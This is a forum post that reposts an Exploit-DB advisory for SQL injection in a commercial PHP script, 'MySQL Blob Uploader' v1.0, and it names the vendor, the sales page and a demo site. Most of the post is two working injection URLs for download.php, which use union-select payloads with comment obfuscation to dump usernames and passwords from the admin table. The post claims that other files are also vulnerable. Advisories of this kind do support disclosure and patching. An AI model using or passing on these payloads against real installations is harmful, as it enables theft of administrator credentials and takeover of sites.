Massaro Posted February 7, 2017 Report Share Posted February 7, 2017 # # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # Etc....Other files have vulnerabilities ... # # # # # Sursa: https://www.exploit-db.com/exploits/41267/. 3 Quote Link to comment Share on other sites More sharing options...
